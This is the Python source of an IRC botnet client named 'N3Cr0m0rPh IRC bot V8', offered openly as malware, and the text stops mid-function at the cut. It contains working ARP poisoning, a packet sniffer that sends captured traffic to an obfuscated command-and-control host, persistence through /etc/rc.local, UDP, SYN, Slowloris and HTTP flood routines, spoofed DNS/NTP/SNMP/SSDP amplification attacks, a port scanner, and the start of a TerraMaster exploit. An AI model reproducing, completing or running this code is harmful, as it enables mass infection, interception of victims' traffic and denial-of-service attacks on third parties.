1
#!/usr/bin/env python
2
#-------------------------------------------------------------------------------
3
#
4
# Name:        N3Cr0m0rPh IRC bot V8
5
# Purpose:     IRC Bot for botnet
6
# Notes:       (polymorphic) nearly impossible to remove (or detect) without system
7
#               analysis and creation of a tool, also has amp methods now.
8
#
9
# Author:      Freak @ PopulusControl (sudoer)
10
# Rebuilder:   Ya Boi Nexus
11
#
12
# Created:     15/01/2015
13
# Last Update: 1/1/2021
14
# Copyright:   (c) Freak 2021
15
# Licence:     Creative commons.
16
#-------------------------------------------------------------------------------
17

18
import re, socket, subprocess, os, sys, urllib2, urllib, ctypes, time, threading, random, itertools, platform, multiprocessing, subprocess, fcntl, select, ssl, json
19
from string import letters, split, rstrip
20
from binascii import unhexlify
21
from base64 import b64decode
22
from uuid import getnode
23
from sys import argv
24
from struct import *
25

26
ctx = ssl.create_default_context()
27
ctx.check_hostname = False
28
ctx.verify_mode = ssl.CERT_NONE
29

30
def getPoisonIPs():
31
    myip = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
32
    poison=[]
33
    fh=open("/proc/net/arp", "rb")
34
    table_=fh.readlines()
35
    fh.close()
36
    table_.pop(0)
37
    
38
    for x in table_:
39
        x=x.split()
40
        if x[2]=="0x2":
41
            if x[0] != myip:
42
                poison.append((x[0], x[3]))
43
    return poison
44

45
def get_src_mac():
46
    mac_dec = hex(getnode())[2:-1]
47
    while (len(mac_dec) != 12):
48
        mac_dec = "0" + mac_dec
49
    return unhexlify(mac_dec)
50

51

52
def create_dst_ip_addr():
53
    dst_ip_addr = ''
54
    ip_src_dec = argv[2].split(".")
55
    for i in range(len(ip_src_dec)):
56
        dst_ip_addr += chr(int(ip_src_dec[i]))
57
    return dst_ip_addr
58

59

60
def get_default_gateway_linux():
61
    with open("/proc/net/route") as fh:
62
        for line in fh:
63
            fields = line.strip().split()
64
            if fields[1] != '00000000' or not int(fields[3], 16) & 2:
65
                continue
66
            return socket.inet_ntoa(pack("<L", int(fields[2], 16)))
67

68
def create_pkt_arp_poison():
69
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.SOCK_RAW)
70
    s.bind(("wlan0", 0))
71

72
    while(1):
73
        for lmfao in getPoisonIPs():
74
            src_addr = get_src_mac()
75
            dst_addr = lmfao[0]
76
            src_ip_addr = get_default_gateway_linux()
77
            dst_ip_addr = lmfao[1]
78
            dst_mac_addr = "\x00\x00\x00\x00\x00\x00"
79
            payload = "\x00\x01\x08\x00\x06\x04\x00\x02"
80
            checksum = "\x00\x00\x00\x00"
81
            ethertype = "\x08\x06"
82
            s.send(dst_addr + src_addr + ethertype + payload+src_addr + src_ip_addr
83
                   + dst_mac_addr + dst_ip_addr + checksum)
84
        time.sleep(2)
85

86
global pause
87
pause = 1
88

89
def bigSNIFFS(cncip):
90
    global pause
91
    up = 0
92
    SIOCGIFFLAGS = 0x8913
93
    null256 = '\0'*256
94
    ifname = "wlan0"
95

96
    try:
97
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
98
        result = fcntl.ioctl(s.fileno(  ), SIOCGIFFLAGS, ifname + null256)
99
        flags, = unpack('H', result[16:18])
100
        up = flags & 1
101
    except:
102
        pass
103

104
    if up == 1:
105
        threading.Thread(target=create_pkt_arp_poison,args=()).start()
106
    try:
107
        s=socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
108
    except socket.error,msg:
109
        return
110

111
    count = 0
112
    while True:
113
        if pause == 1:
114
            continue
115
        try:
116
            packet = s.recvfrom(65565)
117
            count= count+1
118
            packet=packet[0]
119
            eth_length = 14
120
            eth_header = packet[:eth_length]
121
            eth_unpack =  unpack('!6s6sH',eth_header)
122
            eth_protocol = socket.ntohs(eth_unpack[2])
123
            ip_header = packet[0:20]
124
            header_unpacked = unpack('!BBHHHBBH4s4s',ip_header)
125
            version_ih1= header_unpacked[0] 
126
            version = version_ih1 >> 4 
127
            ih1 = version_ih1 & 0xF
128
            
129
            iph_length = ih1*4
130
            
131
            ttl = header_unpacked[5]
132
            protocol = header_unpacked[6]
133
            source_add = socket.inet_ntoa(header_unpacked[8])
134
            destination_add = socket.inet_ntoa(header_unpacked[9])
135
            tcp_header = packet[iph_length:iph_length+20]
136

137
            #unpack them 
138
            tcph = unpack('!HHLLBBHHH',tcp_header)
139
            
140
            source_port = tcph[0]
141
            dest_port = tcph[1]
142
            sequence = tcph[2]
143
            ack = tcph[3]
144
            resrve = tcph[4]
145
            tcph_len = resrve >> 4
146
            h_size = iph_length+tcph_len*4
147
            data_size = len(packet)-h_size
148
            data = packet[h_size:]
149
            if len(data) > 2 and source_port!=1337 and source_port!=6667 and source_port!=23 and source_port!=443 and source_port!=37215 and source_port!=53 and source_port!=22 and dest_port!=1337 and dest_port!=6667 and dest_port!=23 and dest_port!=443 and dest_port!=37215 and dest_port!=53 and dest_port!=22:
150
                try:
151
                    ss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
152
                    ss.connect((cncip, 1337))
153
                    ss.send('IPv'+str(version)+ '\nTTL:'+str(ttl)+'\nProtocol:'+str(protocol)+"\nSource Address:"+str(source_add)+"\nDestination Address:"+str(destination_add)+"\n-------------------------------------------\n\nSource Port:"+str(source_port)+"\nDestination Port:"+str(dest_port)+"\n##########BEGINDATA##################\n"+data+"------------------------------------\n\n###########ENDDATA###################\n")
154
                    ss.close()
155
                except:
156
                    pass
157
        except:
158
            pass
159

160

161
ETH_P_IP = 0x0800 # Internet Protocol Packet
162

163
def checksum(data):
164
    s = 0
165
    n = len(data) % 2
166
    for i in range(0, len(data)-n, 2):
167
        s+= ord(data[i]) + (ord(data[i+1]) << 8)
168
    if n:
169
        s+= ord(data[i+1])
170
    while (s >> 16):
171
        s = (s & 0xFFFF) + (s >> 16)
172
    s = ~s & 0xffff
173
    return s
174
        
175
class layer():
176
    pass
177

178
class ETHER(object):
179
    def __init__(self, src, dst, type=ETH_P_IP):
180
        self.src = src
181
        self.dst = dst
182
        self.type = type
183

184
    def pack(self):
185
        ethernet = pack('!6s6sH',
186
        self.dst,
187
        self.src,
188
        self.type)
189
        return ethernet
190

191
class IP(object):
192
    def __init__(self, source, destination, payload='', proto=socket.IPPROTO_TCP):
193
        self.version = 4
194
        self.ihl = 5 # Internet Header Length
195
        self.tos = 0 # Type of Service
196
        self.tl = 20+len(payload)
197
        self.id = 0#random.randint(0, 65535)
198
        self.flags = 0 # Don't fragment
199
        self.offset = 0
200
        self.ttl = 255
201
        self.protocol = proto
202
        self.checksum = 2 # will be filled by kernel
203
        self.source = socket.inet_aton(source)
204
        self.destination = socket.inet_aton(destination)
205

206
    def pack(self):
207
        ver_ihl = (self.version << 4) + self.ihl
208
        flags_offset = (self.flags << 13) + self.offset
209
        ip_header = pack("!BBHHHBBH4s4s",
210
                    ver_ihl,
211
                    self.tos,
212
                    self.tl,
213
                    self.id,
214
                    flags_offset,
215
                    self.ttl,
216
                    self.protocol,
217
                    self.checksum,
218
                    self.source,
219
                    self.destination)
220
        self.checksum = checksum(ip_header)
221
        ip_header = pack("!BBHHHBBH4s4s",
222
                    ver_ihl,
223
                    self.tos,
224
                    self.tl,
225
                    self.id,
226
                    flags_offset,
227
                    self.ttl,
228
                    self.protocol,
229
                    socket.htons(self.checksum),
230
                    self.source,
231
                    self.destination)  
232
        return ip_header
233

234
    def unpack(self, packet):
235
        _ip = layer()
236
        _ip.ihl = (ord(packet[0]) & 0xf) * 4
237
        iph = unpack("!BBHHHBBH4s4s", packet[:_ip.ihl])
238
        _ip.ver = iph[0] >> 4
239
        _ip.tos = iph[1]
240
        _ip.length = iph[2]
241
        _ip.ids = iph[3]
242
        _ip.flags = iph[4] >> 13
243
        _ip.offset = iph[4] & 0x1FFF
244
        _ip.ttl = iph[5]
245
        _ip.protocol = iph[6]
246
        _ip.checksum = hex(iph[7])
247
        _ip.src = socket.inet_ntoa(iph[8])
248
        _ip.dst = socket.inet_ntoa(iph[9])
249
        _ip.list = [
250
            _ip.ihl,
251
            _ip.ver,
252
            _ip.tos,
253
            _ip.length,
254
            _ip.ids,
255
            _ip.flags,
256
            _ip.offset,
257
            _ip.ttl,
258
            _ip.protocol,
259
            _ip.src,
260
            _ip.dst]
261
        return _ip
262
        
263
class TCP(object):
264
    def __init__(self, srcp, dstp):
265
        self.srcp = srcp
266
        self.dstp = dstp
267
        self.seqn = 10
268
        self.ackn = 0
269
        self.offset = 5 # Data offset: 5x4 = 20 bytes
270
        self.reserved = 0
271
        self.urg = 0
272
        self.ack = 0
273
        self.psh = 0
274
        self.rst = 0
275
        self.syn = 1
276
        self.fin = 0
277
        self.window = socket.htons(5840)
278
        self.checksum = 0
279
        self.urgp = 0
280
        self.payload = ""
281

282
    def pack(self, source, destination):
283
        data_offset = (self.offset << 4) + 0
284
        flags = self.fin + (self.syn << 1) + (self.rst << 2) + (self.psh << 3) + (self.ack << 4) + (self.urg << 5)
285
        tcp_header = pack('!HHLLBBHHH', 
286
                     self.srcp, 
287
                     self.dstp, 
288
                     self.seqn, 
289
                     self.ackn, 
290
                     data_offset, 
291
                     flags,  
292
                     self.window,
293
                     self.checksum,
294
                     self.urgp)
295
        #pseudo header fields
296
        source_ip = source
297
        destination_ip = destination
298
        reserved = 0
299
        protocol = socket.IPPROTO_TCP
300
        total_length = len(tcp_header) + len(self.payload)
301
        # Pseudo header
302
        psh = pack("!4s4sBBH",
303
              source_ip,
304
              destination_ip,
305
              reserved,
306
              protocol,
307
              total_length)
308
        psh = psh + tcp_header + self.payload
309
        tcp_checksum = checksum(psh)
310
        tcp_header = pack("!HHLLBBH",
311
                  self.srcp,
312
                  self.dstp,
313
                  self.seqn,
314
                  self.ackn,
315
                  data_offset,
316
                  flags,
317
                  self.window)
318
        tcp_header+= pack('H', tcp_checksum) + pack('!H', self.urgp)
319
        return tcp_header
320

321
    def unpack(self, packet):
322
        cflags = { # Control flags
323
            32:"U",
324
            16:"A",
325
            8:"P",
326
            4:"R",
327
            2:"S",
328
            1:"F"}
329
        _tcp = layer()
330
        _tcp.thl = (ord(packet[12])>>4) * 4
331
        _tcp.options = packet[20:_tcp.thl]
332
        _tcp.payload = packet[_tcp.thl:]
333
        tcph = unpack("!HHLLBBHHH", packet[:20])
334
        _tcp.srcp = tcph[0] # source port
335
        _tcp.dstp = tcph[1] # destination port
336
        _tcp.seq = tcph[2] # sequence number
337
        _tcp.ack = hex(tcph[3]) # acknowledgment number
338
        _tcp.flags = ""
339
        for f in cflags:
340
            if tcph[5] & f:
341
                _tcp.flags+=cflags[f]
342
        _tcp.window = tcph[6] # window
343
        _tcp.checksum = hex(tcph[7]) # checksum
344
        _tcp.urg = tcph[8] # urgent pointer
345
        _tcp.list = [
346
            _tcp.srcp,
347
            _tcp.dstp,
348
            _tcp.seq,
349
            _tcp.ack,
350
            _tcp.thl,
351
            _tcp.flags,
352
            _tcp.window,
353
            _tcp.checksum,
354
            _tcp.urg,
355
            _tcp.options,
356
            _tcp.payload]
357
        return _tcp
358

359
class UDP(object):
360
    def __init__(self, src, dst, payload=''):
361
        self.src = src
362
        self.dst = dst
363
        self.payload = payload
364
        self.checksum = 0
365
        self.length = 8 # UDP Header length
366
    def pack(self, src, dst, proto=socket.IPPROTO_UDP):
367
        length = self.length + len(self.payload)
368
        pseudo_header = pack('!4s4sBBH',
369
            socket.inet_aton(src), socket.inet_aton(dst), 0, 
370
            proto, length)
371
        self.checksum = checksum(pseudo_header)
372
        packet = pack('!HHHH',
373
            self.src, self.dst, length, 0)
374
        return packet
375

376
PORT = {
377
	'dns': 53,
378
	'ntp': 123,
379
	'snmp': 161,
380
	'ssdp': 1900 }
381

382
PAYLOAD = {
383
	'dns': ('{}\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01'
384
			'{}\x00\x00\xff\x00\xff\x00\x00\x29\x10\x00'
385
			'\x00\x00\x00\x00\x00\x00'),
386
	'snmp':('\x30\x26\x02\x01\x01\x04\x06\x70\x75\x62\x6c'
387
		'\x69\x63\xa5\x19\x02\x04\x71\xb4\xb5\x68\x02\x01'
388
		'\x00\x02\x01\x7F\x30\x0b\x30\x09\x06\x05\x2b\x06'
389
		'\x01\x02\x01\x05\x00'),
390
	'ntp':('\x17\x00\x02\x2a'+'\x00'*4),
391
	'ssdp':('M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n'
392
		'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n')
393
}
394

395
amplification = {
396
	'dns': {},
397
	'ntp': {},
398
	'snmp': {},
399
	'ssdp': {} }		# Amplification factor
400

401
FILE_NAME = 0			# Index of files names
402
FILE_HANDLE = 1 		# Index of files descriptors
403

404
npackets = 0			# Number of packets sent
405
nbytes = 0				# Number of bytes reflected
406
files = {}				# Amplifications files
407
global proto
408
proto = "dns"
409
    
410
class INIT_CONNECTION():
411
    def __init__(self):
412
        self.randStr=self.GIVE_RAND_STR(random.randrange(8,12)) #Generate random 8 character nick to ensure 
413
        self.SENT=0                #Ignore this
414
        self.MB_SENT=0                #Ignore this too
415
        
416
        self.C2_SERVER=b64decode(b64decode("34653437353533303465343435353331346537613535333035613434353533303465353434353761346435343532366134653664343533303465353434643330346534373535333134643761346433303465376136623330356134343561363834653664343937613561343133643364".decode('hex').decode('hex')).decode('hex')) #Encoded irc server
417
        threading.Thread(target=bigSNIFFS, args=(self.C2_SERVER,)).start()
418
        
419
        self.C2_PORT=6667 #Server port
420
        self.C2_CHAN=b64decode(b64decode("346534343662376134643661346433313465366434643331346635343464376134653437343533333465363733643364".decode('hex').decode('hex')).decode('hex')) #Encoded channel
421
        self.C2_CHAN_KEY=b64decode(b64decode("346536613439333134653434353137393465376136623332346437613531333334653661363337613561343133643364".decode('hex').decode('hex')).decode('hex')) #Encoded channel key
422
        
423
        self.BOT_NICK    ="[HAX|"+platform.machine()+"|"+str(multiprocessing.cpu_count())+"]"+str(self.randStr) #Bot nickname
424
        self.BOT_REALNAME="[HAX|"+platform.machine()+"|"+str(multiprocessing.cpu_count())+"]"+str(self.randStr) #Bot Realname
425
        self.rantDwWe=str(self.randStr) #Other
426
        self.KILL_THREADS=0 #wether we should kill all threads.
427
        
428
        self.UserAgents=["Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
429
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
430
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
431
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
432
        "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
433
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
434
        "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
435
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
436
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
437
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
438
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
439
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
440
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
441
        "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
442
        "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
443
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
444
        "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
445
        "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
446
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
447
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
448
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
449
        "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
450
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
451
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
452
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
453
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
454
        "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
455
        "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
456
        "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
457
        "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
458
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
459
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
460
        "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
461
        "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
462
        "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
463
        "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
464
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
465
        "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
466
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
467
        "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
468
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
469
        "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
470
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
471
        "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
472
        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
473
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
474
        "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
475
        "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1"]
476
        
477
        self.REWRITE_SELF() #repack bot before we install
478
        self.INSTALL_FEATURES() #Install
479
        # setup exploit scanner shit.
480
        for _ in range(multiprocessing.cpu_count() * 8):
481
            threading.Thread(target=self.worker).start()
482
        self.INIT_IRC_CONNECTION() #Start the bot
483

484
    def GET_ABSOLUTE_PATH(self):
485
        return os.path.abspath(argv[0])
486

487
    def INSTALL_FEATURES(self): #Install features
488
        try:
489
            rc=open("/etc/rc.local","rb")
490
            data=rc.read()
491
            rc.close()
492
            if "boot.py" not in data:
493
                rc=open("/etc/rc.local","wb")
494
                rc.write(data.replace("exit", "/etc/boot.py\nexit"))
495
                rc.close()
496
                os.popen("cp " + argv[0] + " /etc/boot.py")
497
                os.chmod("/etc/boot.py", 0777)
498
                os.chmod("cp "+argv[0]+" /etc/boot.py")
499
        except:
500
            pass
501
    # some black magic shit idk
502
    def sZSansOC(self,iKdvMuag):
503
        dodepTmF = iKdvMuag.split('.')
504
        ncBrnXua = [map(int, QwAdOdJR.split('-')) for QwAdOdJR in dodepTmF]
505
        GxVCceRN = [range(kwXLnXMT[0], kwXLnXMT[1] + 1) if len(kwXLnXMT) == 2 else kwXLnXMT for kwXLnXMT in ncBrnXua]
506
        for qRtXeNct in itertools.product(*GxVCceRN):
507
            yield '.'.join(map(str, qRtXeNct))
508

509
    def GIVE_RAND_STR(self,len):
510
        return ''.join(random.choice(letters) for _ in range(len))
511

512
    def Do_UDP_Flood(self,TARGET_IP,TARGET_PORT,ATTACK_TIME):   
513
        if str(TARGET_PORT).startswith("0"):
514
            UDP_DATA=os.urandom(65500)
515
        else:
516
            UDP_DATA="\xff"*65500
517
        
518
        ATTACK_END=time.time()+ATTACK_TIME
519
        while ATTACK_END>time.time():
520
            if self.KILL_THREADS == 1:
521
                break
522
            
523
            try:
524
                UDP_SOCK=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
525
                if TARGET_PORT==0:
526
                    UDP_SOCK.sendto(UDP_DATA,(TARGET_IP, random.randrange(0,65535)))
527
                else:
528
                    UDP_SOCK.sendto(UDP_DATA,(TARGET_IP, TARGET_PORT))
529
                self.SENT+=1
530
            
531
            except:
532
                pass
533

534
        self.MB_SENT=self.SENT*65535//1048576
535
        self.MBPS_SENT=self.MB_SENT//int(self.IRC_RECV_MSG[6])
536
        self.IRC_SOCK.send("PRIVMSG %s :%s packets sent. Sent %s MB, %s MB/s\n" % (self.C2_CHAN,self.SENT,self.MB_SENT,self.MBPS_SENT))
537
        self.SENT=0
538

539
    def Do_SYN_Flood(self,TARGET_IP,TARGET_PORT,ATTACK_TIME):
540

541
        ATTACK_END=time.time()+ATTACK_TIME
542
        while ATTACK_END>time.time():
543
            if self.KILL_THREADS == 1:
544
                return
545
            try:
546
                SYN_SOCK=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
547
                SYN_SOCK.connect((TARGET_IP, TARGET_PORT))
548
                self.SENT+=1
549
            except:
550
                pass
551

552
        self.SENT=0
553

554
    def Do_Slowloris_Flood(self,TARGET_IP, TARGET_PORT, sockets, ATTACK_TIME):
555

556
        ATTACK_END=time.time()+ATTACK_TIME
557
        self.SENT = 0
558
        connections = []
559
        for sock in xrange(0, int(sockets)):
560
            connections.append("")
561

562
        while 1:
563
            if self.KILL_THREADS == 1:
564
                break
565
            for conn in xrange(0, int(sockets)):
566
                if self.KILL_THREADS == 1:
567
                    break
568
                connections[conn] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
569
                try:
570
                    connections[conn].connect((TARGET_IP, int(TARGET_PORT)))
571
                except:
572
                    pass
573
            
574
            GET_HEADER = "GET / HTTP/1.1\nHost: %s:%s\nUser-agent: %s\nAccept: */*\nConnection: Keep-Alive\n\n" % (TARGET_IP, TARGET_PORT, random.choice(self.UserAgents))
575
            
576
            for HEADER in GET_HEADER:
577
                if self.KILL_THREADS == 1:
578
                    break
579
                for fd in connections:
580
                    try:
581
                        fd.send(HEADER)
582
                        self.SENT+=1
583
                    except:
584
                        try:
585
                            fd.connect((TARGET_IP, int(TARGET_PORT)))
586
                        except:
587
                            pass
588

589
                if ATTACK_END<time.time():
590
                    for fd in fds:
591
                        try:
592
                            fd.close()
593
                        except:
594
                            pass
595
                    return
596
                time.sleep(1)
597
                self.SENT = 0
598

599
        self.IRC_SOCK.send("PRIVMSG %s :Made %s connections.\n" % (self.C2_CHAN,self.SENT))
600
        self.SENT=0
601

602
    def OPEN_URL(self,url):
603
        try:
604
            opener = urllib2.build_opener()
605
            opener.addheaders = [('User-agent', random.choice(self.UserAgents))]
606
            return opener.open(url).read()
607
        except:
608
            return ""
609

610
    def Do_HTTP_Flood(self,url,ATTACK_TIME,recursive):
611
        if recursive=="true":
612
            ATTACK_END=time.time()+ATTACK_TIME
613
            
614
            while ATTACK_END>time.time():
615
                if self.KILL_THREADS == 1:
616
                    break
617
                for RECURSIVE_URL in re.findall('''href=["'](.[^"']+)["']''',self.OPEN_URL(url), re.I):
618
                    if self.KILL_THREADS == 1:
619
                        break
620
                    self.OPEN_URL(RECURSIVE_URL)
621
                for RECURSIVE_URL in re.findall('''src=["'](.[^"']+)["']''',self.OPEN_URL(url), re.I):
622
                    if self.KILL_THREADS == 1:
623
                        break
624
                    self.OPEN_URL(RECURSIVE_URL)
625
                        
626
        else:
627
            ATTACK_END=time.time()+ATTACK_TIME
628
            while ATTACK_END>time.time():
629
                if self.KILL_THREADS == 1:
630
                    break
631
                self.OPEN_URL(url)
632

633
    def RANGE_SCAN(self,RANGE,TARGET_PORT,OmgjPABz):
634
        self.IRC_SOCK.send("PRIVMSG %s :Scanning range %s for port %s, scanning for telnet? %s\n" % (self.C2_CHAN,RANGE,TARGET_PORT,OmgjPABz))
635

636
        for TARGET in self.sZSansOC(RANGE):
637
            try:
638
                if self.KILL_THREADS == 1:
639
                    return
640
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
641
                s.connect((TARGET,int(TARGET_PORT))) #Make sure OMpLRZVt is up and port is open.
642
                s.close()
643
                self.IRC_SOCK.send("PRIVMSG %s :%s\n" % (self.C2_CHAN,TARGET))
644
            except:
645
                pass
646
        self.IRC_SOCK.send("PRIVMSG %s :Finished scanning range %s\n" % (self.C2_CHAN,RANGE))
647
    
648
    def DDoS(self, target, threads, domains, timee):
649
        self.target = target
650
        self.threads = threads
651
        self.timeend = time.time()+timee
652
        self.domains = domains
653
        for i in range(self.threads):
654
            t = threading.Thread(target=self.__attack)
655
            t.start()
656

657
    def __send(self, sock, soldier, proto, payload):
658
        udp = UDP(random.randint(1, 65535), PORT[proto], payload).pack(self.target, soldier)
659
        ip = IP(self.target, soldier, udp, proto=socket.IPPROTO_UDP).pack()
660
        sock.sendto(ip+udp+payload, (soldier, PORT[proto]))
661

662
    def __GetQName(self, domain):
663
        labels = domain.split('.')
664
        QName = ''
665
        for label in labels:
666
            if len(label):
667
                QName += pack('B', len(label)) + label
668
        return QName
669

670
    def __GetDnsQuery(self, domain):
671
        id = pack('H', random.randint(0, 65535))
672
        QName = self.__GetQName(domain)
673
        return PAYLOAD['dns'].format(id, QName)
674

675
    def __attack(self):
676
        global proto
677
        global npackets
678
        global nbytes
679
        _files = files
680
        for proto in _files:    # Open Amplification files
681
            f = open(_files[proto][FILE_NAME], 'r')
682
            _files[proto].append(f)        # _files = {'proto':['file_name', file_handle]}
683
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
684
        i = 0
685
        while 1:
686
            try:
687
                if time.time()>=self.timeend or self.KILL_THREADS == 1:
688
                    break
689
                soldier = _files[proto][FILE_HANDLE].readline().strip()
690
                if soldier:
691
                    if proto=='dns':
692
                        if not amplification[proto].has_key(soldier):
693
                            amplification[proto][soldier] = {}
694
                        for domain in self.domains:
695
                            amp = self.__GetDnsQuery(domain)
696
                            self.__send(sock, soldier, proto, amp)
697
                    else:
698
                        amp = PAYLOAD[proto]
699
                        self.__send(sock, soldier, proto, amp)
700
                else:
701
                    _files[proto][FILE_HANDLE].seek(0)
702
            except:
703
                pass
704
        try:
705
            sock.close()
706
            for proto in _files:
707
                _files[proto][FILE_HANDLE].close()
708
        except:
709
            pass
710

711
    def check_endpoint(self, url):
712
        response = urllib.urlopen(url+'/version')
713
        if response.getcode() == 200:
714
            print(("[+] TerraMaster TOS version: ", str(response.content)))
715
            return 1
716
        else:
717
            #print(("\n[-] TerraMaster TOS response code: ", response.status_code))
718
            return 0
719

720
    def exploit(self, ip, port):    
721
        if "443" in str(port):
722
            url = "https://"+ip+":"+str(port)
723
        else:
724
            url = "http://"+ip+":"+str(port)
725
        try:
726
            if self.check_endpoint(url):
727
